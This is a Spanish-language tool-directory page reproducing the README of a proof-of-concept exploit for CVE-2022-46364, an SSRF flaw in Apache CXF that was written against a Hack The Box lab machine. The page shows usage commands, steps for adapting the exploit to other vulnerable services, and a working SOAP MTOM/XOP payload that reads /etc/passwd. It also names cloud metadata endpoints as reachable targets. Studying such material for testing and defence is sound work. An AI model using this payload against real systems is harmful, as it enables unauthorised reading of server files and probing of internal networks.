Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-46364 — Exploit de prueba de concepto para CVE-2022-46364, una vulnerabilidad SSRF en Apache CXF que permite la lectura arbitraria de archivos y el sondeo de redes internas a través de solicitudes SOAP MTOM/XOP manipuladas. | Kitploit
Herramientas/GitHubGitHub/c0gnit00/cve-2022-46364
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubc0gnit00/cve-2022-46364

CVE-2022-46364

Exploit de prueba de concepto para CVE-2022-46364, una vulnerabilidad SSRF en Apache CXF que permite la lectura arbitraria de archivos y el sondeo de redes internas a través de solicitudes SOAP MTOM/XOP manipuladas.

Ver Repositorio
1hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-46364 — Apache CXF MTOM/XOP SSRF (lectura de archivos)

Exploit de prueba de concepto para CVE-2022-46364 — una vulnerabilidad de falsificación de solicitud del lado del servidor (SSRF) en el procesamiento de solicitudes MTOM/XOP de Apache CXF.


Resumen de la vulnerabilidad

CVE-2022-46364 afecta a las versiones de Apache CXF anteriores a 3.4.10 y 3.5.5. Cuando MTOM (Mecanismo de optimización de transmisión de mensajes) está habilitado en un servicio SOAP, el deserializador de CXF valida incorrectamente el atributo href dentro de los elementos <xop:Include>. En lugar de restringir href a URIs cid: (como lo exige la especificación XOP de W3C), CXF desreferencia URIs arbitrarias — incluyendo file://, http:// y https://.

Esto permite a un atacante no autenticado:

  • Leer archivos locales arbitrarios (file:///etc/passwd)
  • Realizar SSRF contra servicios internos (http://169.254.169.254/)
  • Potencialmente alcanzar puntos finales de metadatos en la nube o APIs internas

Objetivo

Este PoC fue escrito y probado contra la máquina Hack The Box:

Endpoint objetivo: http://devarea.htb:8080/employeeservice

Pero pequeños cambios en la carga útil XML según el WSDL objetivo lo hacen adaptable al entorno objetivo.


Uso

Leer /etc/passwd (objetivo predeterminado)

La URL predeterminada es http://devarea.htb:8080/employeeservice.

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd

URL objetivo personalizada

root@kitploit:~
python3 CVE-2022-46364.py --url http://target:8080/employeeservice --file /etc/passwd

Modo verboso — mostrar solicitud y respuesta sin procesar

root@kitploit:~
python3 CVE-2022-46364.py --file /etc/passwd --verbose

Adaptación a otros objetivos

Importante: Este script está codificado para la estructura WSDL de HTB DevArea. Para usarlo contra otro servicio vulnerable de Apache CXF, debe modificar la carga útil SOAP dentro de build_payload() para que coincida con el contrato WSDL del objetivo.

Pasos para adaptar

  1. Obtener el WSDL del objetivo:

    root@kitploit:~
    curl http://target:8080/employeeservice?wsdl
    
  2. Identificar los detalles del servicio:

    • targetNamespace (ej. http://devarea.htb/)
    • Nombre de la operación (ej. submitReport)
    • Estructura de parámetros (ej. <arg0> con <content> anidado)
  3. Modificar la carga útil en build_payload():

    • Actualizar el espacio de nombres (xmlns:dev="...")
    • Actualizar el nombre de la operación (<dev:submitReport>)
    • Actualizar el envoltorio de parámetros (<arg0>)
    • Colocar <xop:Include href="file://{filepath}"/> dentro de un campo que el servidor procesará como un adjunto
  4. Actualizar --url al ejecutar el script.

Ejemplo de adaptación WSDL

Dado este fragmento WSDL:

root@kitploit:~
<wsdl:definitions targetNamespace="http://example.com/">
  <wsdl:operation name="uploadDocument">
    <wsdl:input message="tns:uploadDocument"/>
  </wsdl:operation>
</wsdl:definitions>

Su carga útil debería ser:

root@kitploit:~
<soapenv:Envelope xmlns:soapenv="..." xmlns:ex="http://example.com/" xmlns:xop="...">
  <soapenv:Body>
    <ex:uploadDocument>
      <document>
        <xop:Include href="file:///etc/passwd"/>
      </document>
    </ex:uploadDocument>
  </soapenv:Body>
</soapenv:Envelope>

Cómo funciona

  1. El script crea una solicitud HTTP multipart/related con Content-Type: application/xop+xml.
  2. Dentro del cuerpo SOAP, se coloca un elemento <xop:Include href="file:///etc/passwd"/>.
  3. El servidor CXF vulnerable trata esto como una referencia de adjunto y desreferencia la URI file://.
  4. El contenido del archivo se lee, se codifica en base64 por el servidor y se devuelve dentro del elemento <return> SOAP.
  5. El script extrae la cadena base64 después de Content: y la decodifica.

Referencias

RecursoEnlace
Aviso de Apache CXFCVE-2022-46364
Entrada NVDNVD — CVE-2022-46364
Apache Jira (CXF-8706)CXF-8706
Especificación XOP de W3CXML-binary Optimized Packaging
Análisis detallado de PenligentCVE-2022-46364 PoC en la práctica
HTB DevAreaHack The Box — DevArea

Descargo de responsabilidad

Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. Siempre obtenga permiso explícito antes de probar sistemas que no le pertenezcan. El autor no se responsabiliza por el mal uso o daños causados por este script.


Licencia

Licencia MIT — siéntase libre de usar, modificar y compartir con la atribución adecuada.

Descargar herramienta